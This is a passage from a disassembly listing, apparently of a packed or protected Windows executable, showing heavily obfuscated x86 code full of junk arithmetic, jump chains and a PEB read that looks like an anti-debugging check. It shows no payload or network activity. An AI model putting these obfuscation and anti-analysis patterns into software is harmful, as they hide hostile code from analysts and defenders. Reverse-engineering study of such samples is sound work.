; END OF FUNCTION CHUNK	FOR sub_445DC4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_44EA3B:				; CODE XREF: sub_44C2EA-B928j
		rol	esi, 1
		and	esi, 543930h
		add	esi, (offset loc_44DA4C+5)
		xchg	esi, [esp+0]
		jmp	loc_44EA5C
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------
		jmp	ds:off_41D0B0
; ---------------------------------------------------------------------------

loc_44EA57:				; CODE XREF: hvvrg7ie:004441E8j
		jmp	loc_45B7F7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_44EA5C:				; CODE XREF: sub_44C2EA+2762j
					; sub_446FB6:loc_4502D6j ...
		jnb	loc_43E7AB
		xchg	edi, [esp+0]
		jmp	loc_44A539
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C354

loc_44EA6A:				; CODE XREF: sub_43C354-1269j
		sub	edi, ecx
		jmp	loc_454A54
; END OF FUNCTION CHUNK	FOR sub_43C354
; ---------------------------------------------------------------------------

loc_44EA71:				; CODE XREF: hvvrg7ie:004531E1j
		jz	loc_43FB4A
		jmp	loc_4596AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44EA7C:				; CODE XREF: sub_43F227+13EF8j
		mov	ebp, [esi]
		xor	eax, 0F80A8034h
		or	ebp, esi
		jmp	loc_45A524
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_44EA8B:				; CODE XREF: sub_450434+960Bj
		jge	loc_44097D
		or	ebx, 0E0DCAB31h

loc_44EA97:				; CODE XREF: sub_450434:loc_453F1Fj
		push	8043E298h
		pop	eax
		sub	eax, 70D5BC22h
		rol	eax, 3
		sub	eax, 52C79546h
		add	eax, 5F57F874h
		jmp	loc_44F73C
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------

loc_44EAB7:				; CODE XREF: hvvrg7ie:0044EC58j
		xor	ebx, 0EDB14A83h
		jg	loc_44AC19
		jnz	loc_43A453
		adc	esi, 0EEDB38A2h
; START	OF FUNCTION CHUNK FOR sub_4453EC

loc_44EACF:				; CODE XREF: sub_4453EC:loc_44EC3Dj
		and	ecx, 850DADE0h
		push	offset loc_44C49D
		jmp	nullsub_161
; END OF FUNCTION CHUNK	FOR sub_4453EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A625

loc_44EADF:				; CODE XREF: sub_43A625:loc_44A257j
		pop	eax
		pop	ecx
		pop	edx
		pop	ebx
		xchg	ecx, [esp-10h+arg_C]
		jmp	loc_43B4C1
; END OF FUNCTION CHUNK	FOR sub_43A625
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_44EAEB:				; CODE XREF: sub_45A7E8-1CD55j
		or	eax, eax
		jnz	loc_4590A5
		jmp	loc_45B567
; END OF FUNCTION CHUNK	FOR sub_45A7E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_44EAF8:				; CODE XREF: sub_45038B:loc_4564FAj
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4529B0
		jmp	loc_448C1F
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44352A

loc_44EB06:				; CODE XREF: sub_44352A:loc_45B1FAj
		mov	edx, ebp
		xchg	edx, [esp+0]
		mov	ebp, esp
		push	ecx
		mov	[ebp-4], eax
		call	sub_440603
		push	offset sub_45028F
		jmp	nullsub_457
; END OF FUNCTION CHUNK	FOR sub_44352A

; =============== S U B	R O U T	I N E =======================================



sub_44EB20	proc near		; DATA XREF: sub_454B5C-A18Fo

; FUNCTION CHUNK AT 004506B0 SIZE 0000000E BYTES

		add	edx, 0B609C0CCh
		mov	[edx], eax
		call	sub_4567A2

loc_44EB2D:				; CODE XREF: hvvrg7ie:004549EFj
		cmp	edx, 1ABD8DD4h
		jmp	loc_4506B0
sub_44EB20	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E100

loc_44EB38:				; CODE XREF: sub_43E100+4DF2j
		and	edx, 8F894049h
		test	edx, 80000000h
		jmp	loc_44285D
; END OF FUNCTION CHUNK	FOR sub_43E100
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6BE

loc_44EB49:				; CODE XREF: sub_44C6BE-D0E2j
		add	eax, ebp
		add	eax, 9F5F4E37h
		mov	eax, [eax]
		push	edx
		mov	edx, eax
		jmp	loc_452C1B
; END OF FUNCTION CHUNK	FOR sub_44C6BE
; ---------------------------------------------------------------------------

loc_44EB5B:				; CODE XREF: hvvrg7ie:loc_44FD4Cj
		jz	loc_45A19E
		mov	[edx], ebx
		pushf
		jmp	loc_45A19E
; ---------------------------------------------------------------------------

loc_44EB69:				; CODE XREF: hvvrg7ie:00458BD8j
		add	esi, 53A02437h
		xchg	esi, [esp]
		jmp	sub_450C5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DE4

loc_44EB77:				; CODE XREF: sub_448DE4-2F00j
		and	eax, edi
		jmp	loc_44CFEC
; END OF FUNCTION CHUNK	FOR sub_448DE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B7CB

loc_44EB7E:				; CODE XREF: sub_44B7CB:loc_454C59j
		jnz	loc_44827C
; END OF FUNCTION CHUNK	FOR sub_44B7CB
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44EB84:				; CODE XREF: sub_44D2F8+9346j
		jmp	loc_43E8BF
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451DFF

loc_44EB89:				; CODE XREF: sub_451DFF+8j
		jmp	loc_449E0D
; END OF FUNCTION CHUNK	FOR sub_451DFF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_44EB8E:				; CODE XREF: sub_44191F-2EDFj
		jmp	loc_452538
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
		xchg	edx, eax
		jmp	loc_448278
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_44EB9A:				; CODE XREF: sub_453405-31A9j
		jbe	loc_43D842
		add	eax, 527AE2BFh
		jmp	loc_44FA37
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AE24

loc_44EBAB:				; CODE XREF: sub_43AE24:loc_43C18Aj
		rol	edx, 1Ch
		add	edx, 0B395885Dh
		add	edx, ecx
		add	edx, 2F046E4Ch
		mov	[edx], eax
		jmp	loc_4428DE
; END OF FUNCTION CHUNK	FOR sub_43AE24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_44EBC3:				; CODE XREF: sub_43F227+6953j
		sbb	edi, esi

loc_44EBC5:				; CODE XREF: sub_43AFB6:loc_4568F3j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4529B0
		jmp	loc_453119
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_44EBD6:				; CODE XREF: sub_45B048+1Dj
		jnz	loc_445F09
		jmp	loc_443AB3
; END OF FUNCTION CHUNK	FOR sub_45B048

; =============== S U B	R O U T	I N E =======================================



sub_44EBE1	proc near		; DATA XREF: sub_44261C-751Co
		push	0F20D39F6h
		pop	ebx
		add	ebx, 211151E0h
		and	ebx, 911C24E9h
		cmp	ebx, 3B4C03Eh
		jmp	loc_44EDBE
sub_44EBE1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_44EBFE:				; CODE XREF: sub_44BFF5-7127j
		and	esi, edi
		jz	loc_4559DF
		jmp	loc_45758E
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450EF7

loc_44EC0B:				; CODE XREF: sub_450EF7+5j
		jmp	ds:off_41D05C
; END OF FUNCTION CHUNK	FOR sub_450EF7
; ---------------------------------------------------------------------------

loc_44EC11:				; CODE XREF: hvvrg7ie:0045B8EAj
		jmp	sub_4489AE

; =============== S U B	R O U T	I N E =======================================



sub_44EC16	proc near		; CODE XREF: sub_44EC16:loc_446C12j
					; sub_450EF7p ...

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00445553 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00446C12 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045166F SIZE 00000028 BYTES

		pop	edx
		jnb	loc_445553
		mov	eax, [esp+0]
		push	edx
		push	edx
		push	14EDC441h
		pop	edx
		jmp	loc_443C27
sub_44EC16	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 0Fh,	8Ah, 45h
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0FFh),	0C1h
		db 0EFh, 3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_44EC36:				; CODE XREF: sub_45889B:loc_44BC64j
		xchg	esi, ebp
		jmp	loc_442C9F
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4453EC

loc_44EC3D:				; CODE XREF: sub_4453EC-9713j
		jge	loc_44EACF
; END OF FUNCTION CHUNK	FOR sub_4453EC
; START	OF FUNCTION CHUNK FOR sub_444516

loc_44EC43:				; CODE XREF: sub_444516+4DACj
		jmp	nullsub_110
; END OF FUNCTION CHUNK	FOR sub_444516
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_44EC48:				; CODE XREF: sub_44616F-5068j
		jmp	nullsub_129
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B8A4

loc_44EC4D:				; CODE XREF: sub_44B8A4-E2DFj
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_44B8A4
; ---------------------------------------------------------------------------
		add	edi, 0AFAF8E7Eh
		jmp	loc_44EAB7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_44EC5D:				; CODE XREF: sub_44398A:loc_439A78j
					; sub_44398A+EAACj
		push	4B9CE003h
		pop	eax
		add	eax, 3DC9B919h
		and	eax, 62D403B9h
		call	sub_44E533

loc_44EC74:				; CODE XREF: sub_45B048-ADBEj
		jmp	loc_454255
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------

loc_44EC79:				; CODE XREF: hvvrg7ie:0044E681j
		jmp	loc_448FEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AA1C

loc_44EC7E:				; CODE XREF: sub_44AA1C+12j
		jmp	loc_43DB5E
; END OF FUNCTION CHUNK	FOR sub_44AA1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_44EC83:				; CODE XREF: sub_440643+3EA0j
		jmp	loc_43BD47
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D30A

loc_44EC88:				; CODE XREF: sub_43D30A:loc_4583C1j
		or	eax, eax
		jnz	loc_4544FC
		jmp	loc_440090
; END OF FUNCTION CHUNK	FOR sub_43D30A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B7D

loc_44EC95:				; CODE XREF: sub_455B7D:loc_439473j
					; sub_455B7D-1115Ej
		push	eax
		lea	eax, dword_4562D4
		push	eax
		push	eax
		jmp	loc_4532F3
; END OF FUNCTION CHUNK	FOR sub_455B7D
; ---------------------------------------------------------------------------

locret_44ECA3:				; CODE XREF: hvvrg7ie:loc_448423j
		retn
; ---------------------------------------------------------------------------

loc_44ECA4:				; DATA XREF: hvvrg7ie:0044E663o
		push	0F74AA3F0h
		pop	eax
		rol	eax, 4
		add	eax, 0D76A31CAh
		sub	eax, 1AB72C55h
		add	eax, 61E55549h
		push	ecx
		jmp	loc_44BCBE
; ---------------------------------------------------------------------------

loc_44ECC5:				; CODE XREF: hvvrg7ie:0044CE24j
		jl	loc_456CDA
		sub	ebp, 10FCB9D0h
		jno	loc_447925
		jmp	loc_450854
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439FEE

loc_44ECDC:				; CODE XREF: sub_439FEE+10j
		push	eax
		call	sub_4584F2
		push	0FB97EBB8h
		pop	eax
		sub	eax, 0BCB7F18Bh
		jmp	loc_439E0A
; END OF FUNCTION CHUNK	FOR sub_439FEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44989C

loc_44ECF3:				; CODE XREF: sub_44989C:loc_452AE0j
		add	eax, 0F67D46BAh
		ror	eax, 12h
		add	eax, 0ADC00C10h
		push	ebx
		jmp	loc_43D38B
; END OF FUNCTION CHUNK	FOR sub_44989C
; ---------------------------------------------------------------------------

loc_44ED08:				; CODE XREF: hvvrg7ie:004583E2j
		push	esi
		ror	esi, 3

loc_44ED0C:				; CODE XREF: hvvrg7ie:004583CCj
		rol	edi, 19h
		sub	edi, 0E560FFA5h
		add	edi, 0F1849D59h
		xchg	edi, [esp]
		jmp	loc_43DEE6

; =============== S U B	R O U T	I N E =======================================



sub_44ED23	proc near		; CODE XREF: hvvrg7ie:0043BACCj
					; sub_455751-A8FAp

; FUNCTION CHUNK AT 0043EEFD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C6EC SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044D0E3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044DC18 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00451770 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A5B7 SIZE 00000020 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	ebp, esp
		push	ecx
		jmp	loc_45A5B7
sub_44ED23	endp

; ---------------------------------------------------------------------------
		test	ebp, 2305313Fh
		jmp	loc_444ED3
; ---------------------------------------------------------------------------

loc_44ED3A:				; CODE XREF: hvvrg7ie:004565DAj
		pop	ecx
		jmp	loc_44D594
; ---------------------------------------------------------------------------
		push	ebx
		mov	ebx, ebp
		xchg	ebx, [esp]
		jmp	loc_45509D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_44ED4B:				; CODE XREF: sub_445CCD-A5EBj
		jz	loc_4491CA
		jmp	loc_450D77
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
		push	edi
		push	40658027h
		pop	edi
		xor	edi, 12CFB8D3h
		test	edi, 80h
		jmp	loc_43FEAC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_44ED6E:				; CODE XREF: sub_45B048-20915j
		call	sub_457C82
		jmp	loc_454CE0
; ---------------------------------------------------------------------------

loc_44ED78:				; CODE XREF: sub_45B048:loc_451373j
		mov	eax, large fs:30h
		push	edx
		push	5D83EC42h

loc_44ED85:				; CODE XREF: hvvrg7ie:loc_44C2F2j
		pop	edx
		or	edx, 4D42B240h
		jmp	loc_443B9E
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_44ED91:				; CODE XREF: sub_43D285+D27j
					; sub_43D285:loc_44000Aj
		call	nullsub_14
		retn
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------

loc_44ED97:				; CODE XREF: hvvrg7ie:00442A90j
		jmp	loc_447582
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_14. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4470A9

loc_44ED9D:				; CODE XREF: sub_4470A9+8DC6j
		jmp	nullsub_274
; END OF FUNCTION CHUNK	FOR sub_4470A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444363

loc_44EDA2:				; CODE XREF: sub_444363+Ej
		jmp	loc_4557EC
; END OF FUNCTION CHUNK	FOR sub_444363
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_44EDA7:				; CODE XREF: sub_43D285:loc_453DB5j
		call	sub_439549
		jmp	loc_444916
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A230

loc_44EDB1:				; CODE XREF: sub_44A230:loc_43C172j
		pop	ebx
		or	ebx, 14230E4Bh
		jns	loc_4461F9

loc_44EDBE:				; CODE XREF: sub_44EBE1+18j
		jmp	loc_44E7B5
; END OF FUNCTION CHUNK	FOR sub_44A230
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_44EDC3:				; CODE XREF: sub_4554E8-172B7j
		jmp	loc_4556B1
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
		jnp	loc_455F18
		or	edx, 9CF6E3FEh
		jmp	loc_45160E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_44EDD9:				; CODE XREF: sub_45A234:loc_443826j
		mov	[edx], eax
		pop	edx
		retn
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_44EDDD:				; CODE XREF: sub_455087+3B0Aj
		jmp	loc_44AC9C
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C8FB

loc_44EDE2:				; CODE XREF: sub_44C8FB-EA69j
		jmp	loc_4390E6
; END OF FUNCTION CHUNK	FOR sub_44C8FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448663

loc_44EDE7:				; CODE XREF: sub_448663+8AC6j
					; sub_456E27+Ej
		rol	eax, 3
		push	eax
		jmp	loc_440355
; END OF FUNCTION CHUNK	FOR sub_448663

; =============== S U B	R O U T	I N E =======================================



sub_44EDF0	proc near		; CODE XREF: hvvrg7ie:0043FE47p
					; hvvrg7ie:0045011Ej
		xchg	esi, [esp+0]
		pop	esi
		pushf
		push	0FA92AD88h
		pop	ebx
		jmp	loc_439C2D
sub_44EDF0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500FA

loc_44EE00:				; CODE XREF: sub_4500FA-11C5Cj
		ror	esi, 19h

loc_44EE03:				; CODE XREF: sub_4500FA:loc_452356j
		lea	edx, [ebp-14h]
		push	462B57CCh
		not	eax
		jmp	loc_43D15C
; END OF FUNCTION CHUNK	FOR sub_4500FA
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_44EE13:				; CODE XREF: hvvrg7ie:loc_44F764j
					; hvvrg7ie:00450A1Bj
		call	sub_43FE9B
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458095

loc_44EE19:				; CODE XREF: sub_458095+320Cj
		jmp	loc_459BFA
; END OF FUNCTION CHUNK	FOR sub_458095
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E34F

loc_44EE1E:				; CODE XREF: sub_442334+8j
					; sub_44E34F:loc_454F0Cj
		jmp	loc_43FB9D
; END OF FUNCTION CHUNK	FOR sub_44E34F
; ---------------------------------------------------------------------------

loc_44EE23:				; CODE XREF: hvvrg7ie:0044156Bj
		jmp	loc_443114
; ---------------------------------------------------------------------------
dword_44EE28	dd 0CE00DDF9h		; DATA XREF: sub_447E20-B6C9r
dword_44EE2C	dd 77E75CB5h		; DATA XREF: hvvrg7ie:0043ACFBr
					; sub_43E128+4r ...
; ---------------------------------------------------------------------------

loc_44EE30:				; CODE XREF: hvvrg7ie:004592F2j
		jmp	locret_445DB0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443B00

loc_44EE35:				; CODE XREF: sub_443B00+D557j
		jmp	loc_444723
; END OF FUNCTION CHUNK	FOR sub_443B00
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E100

loc_44EE3A:				; CODE XREF: sub_43E100+9j
		jmp	loc_442EDF
; END OF FUNCTION CHUNK	FOR sub_43E100
; ---------------------------------------------------------------------------
		db 38h
dword_44EE40	dd 2			; DATA XREF: sub_44E72F-1000Dr
					; sub_4446E9+Ar ...
		dd 3 dup(2), 0C0h, 40h,	2 dup(1), 4 dup(2), 0C0h, 40h
		dd 2 dup(1), 4 dup(2), 0C0h, 40h, 2 dup(1), 4 dup(2), 0C0h
		dd 40h,	2 dup(1), 4 dup(2), 0C0h, 40h, 0
		dd 1, 4	dup(2),	0C0h, 40h, 0
		dd 1, 4	dup(2),	0C0h, 40h, 0
		dd 401h, 4 dup(2), 0C0h, 40h, 0
		dd 23h dup(1), 2 dup(2), 4 dup(0)
		dd 40h,	42h, 0C0h, 0C2h, 4 dup(1), 10h dup(1E00h), 0C2h
		dd 42h,	2 dup(0C2h), 0Ch dup(2), 0Ah dup(1), 60h, 5 dup(1)
		dd 4 dup(8), 4 dup(1), 0C0h, 40h, 6 dup(1), 8 dup(0C0h)
		dd 8 dup(40h), 2 dup(1C2h), 20h, 1, 2 dup(2), 0C2h, 42h
		dd 1E0h, 1, 20h, 2 dup(1), 0C0h, 2 dup(1), 4 dup(2), 2 dup(0C0h)
		dd 2 dup(1), 8 dup(2), 4 dup(1A00h), 4 dup(0C0h), 800h
		dd 0A00h, 60h, 1A00h, 4	dup(1),	0
		dd 1, 2	dup(0)
		dd 2 dup(1), 2 dup(2), 6 dup(1), 2 dup(2)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_44F240:				; CODE XREF: sub_454099:loc_457DF6j
		jmp	loc_449B17
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453CA3

loc_44F245:				; CODE XREF: sub_453CA3-374j
		jmp	loc_43D728
; END OF FUNCTION CHUNK	FOR sub_453CA3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E1C

loc_44F24A:				; CODE XREF: sub_451E1C:loc_445C21j
		jl	loc_459814

loc_44F250:				; CODE XREF: sub_45298F+Ej
		jmp	loc_43EC65
; END OF FUNCTION CHUNK	FOR sub_451E1C
; ---------------------------------------------------------------------------
		mov	edx, 55209EBFh
		sub	edi, ebp
		not	ecx
		xor	eax, 2E8731E9h
		jmp	loc_459814
; ---------------------------------------------------------------------------
		add	esi, 0F0DDD660h
		jmp	loc_45652F
; ---------------------------------------------------------------------------

loc_44F274:				; DATA XREF: hvvrg7ie:00445B6Bo
		push	7076E4DEh
		pop	edx
		and	edx, 4920B4E1h
		add	edx, 4EE85F0Dh
		add	edx, ebp
		add	edx, 70F6FC2Fh
		mov	edx, [edx]
		imul	byte ptr [edx]
		jmp	loc_456B04
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_44F297:				; CODE XREF: sub_445CCD+AD83j
		jb	loc_44C8B3

loc_44F29D:				; CODE XREF: sub_445CCD:loc_45178Dj
		add	eax, edx
		xor	eax, ebx
		add	eax, ecx
		push	offset sub_44D527
		jmp	loc_4472F7
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44934B

loc_44F2AD:				; CODE XREF: sub_44934B:loc_43AA01j
		xor	eax, edx
		pop	edx
		mov	edx, [esp+0]
		push	eax
		jmp	loc_43E6D1
; END OF FUNCTION CHUNK	FOR sub_44934B
; ---------------------------------------------------------------------------
		or	eax, eax
		jnz	loc_4431DC
		jmp	loc_445CC2
; ---------------------------------------------------------------------------

locret_44F2C6:				; CODE XREF: hvvrg7ie:0045915Fj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_44F2C7:				; CODE XREF: sub_43E60A+471Dj
		jmp	sub_44DE0A
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_44F2CC:				; CODE XREF: sub_43CD0B:loc_439F91j
		pop	edi
		pushf
		push	2789E09Ch
		pop	eax
		or	eax, 3B68495Bh
		jmp	loc_44188A
; END OF FUNCTION CHUNK	FOR sub_43CD0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451D60

loc_44F2DF:				; CODE XREF: sub_451D60:loc_445BC5j
		call	sub_44F7CF
		push	offset loc_44C5EE
		jmp	loc_44FED3
; END OF FUNCTION CHUNK	FOR sub_451D60
; ---------------------------------------------------------------------------
		push	0D32AB4D4h
		pop	edx
		sub	edx, 2541ED28h
		xor	edx, 0BF0FC744h
		sub	edx, 853893FAh
		xor	edx, 0CEC2209h
		call	sub_446A16
		jmp	loc_43C15F
; ---------------------------------------------------------------------------

locret_44F316:				; CODE XREF: hvvrg7ie:loc_45B59Aj
		retn
; ---------------------------------------------------------------------------
		push	35C75AEFh
		pop	eax
		and	eax, 0AF5ED13Ch
		test	eax, 2000h
		jmp	loc_45A293
; ---------------------------------------------------------------------------
		push	ecx
		push	0BEAEEDF8h
		pop	ecx
		or	ecx, 15A5DA0h
		add	ecx, 0E189469Ah
		xor	ecx, ds:4000FBh
		sub	ecx, 0B819069h
		add	ecx, 0B9356391h
		jmp	loc_454F7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4405AA

loc_44F358:				; CODE XREF: sub_4405AA-C8j
		or	eax, 562CF5EEh
		add	eax, 0A8C7E1D8h
		popf
		push	offset loc_4586A7
		jmp	loc_458A09
; END OF FUNCTION CHUNK	FOR sub_4405AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A7E8

loc_44F36F:				; CODE XREF: sub_45A7E8+D85j
		xor	ebp, 88242B32h
		sbb	esi, 0C39CE8AFh
		jmp	loc_44998D
; END OF FUNCTION CHUNK	FOR sub_45A7E8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_50. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E1C9

loc_44F381:				; CODE XREF: sub_44E1C9+3E8Fj
		jmp	loc_44744C
; END OF FUNCTION CHUNK	FOR sub_44E1C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459B45

loc_44F386:				; CODE XREF: sub_459B45-B1CBj
		jmp	sub_43D16B
; END OF FUNCTION CHUNK	FOR sub_459B45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44F38B:				; CODE XREF: sub_44D2F8-E82j
		popf
		jmp	loc_44975D
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

loc_44F391:				; CODE XREF: hvvrg7ie:0043C9D8j
		cmp	ecx, eax
		sub	eax, edi
		jmp	loc_43D121

; =============== S U B	R O U T	I N E =======================================



sub_44F39A	proc near		; CODE XREF: sub_445934+A35Bp
					; hvvrg7ie:0045116Bj

; FUNCTION CHUNK AT 0044CAD5 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	[ebp-8], eax
		mov	eax, [ebp-8]
		mov	esp, ebp
		pop	ebp
		jmp	loc_44CAD5
sub_44F39A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_44F3AC:				; CODE XREF: sub_450AA8-61A9j
		jnz	loc_45594D
		jmp	loc_44375B
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
		popf
		jmp	sub_449E02
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B9C

loc_44F3BD:				; CODE XREF: sub_455B9C+6j
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		pop	ebp
		push	0F8A922D0h
		pop	eax
		or	eax, 6EBDB092h
		jmp	loc_44FD51
; END OF FUNCTION CHUNK	FOR sub_455B9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_44F3D4:				; CODE XREF: sub_44B1C6:loc_4517DDj
		xchg	ebx, [esp+0]
		jmp	nullsub_190
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; ---------------------------------------------------------------------------

loc_44F3DC:				; CODE XREF: hvvrg7ie:loc_455C0Dj
					; DATA XREF: sub_440631+155D2o
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-1Ch]
		mov	eax, ds:dword_44EE40[eax*4]
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jz	loc_43E736
		jmp	loc_44CBC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107D

loc_44F3FB:				; CODE XREF: sub_44107D-65EEj
					; hvvrg7ie:loc_44FE4Ej
		push	1388h
		call	sub_44BF29
		push	0
		call	sub_449007
		jmp	loc_4580DF
; END OF FUNCTION CHUNK	FOR sub_44107D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F13A

loc_44F411:				; CODE XREF: sub_43F13A+220j
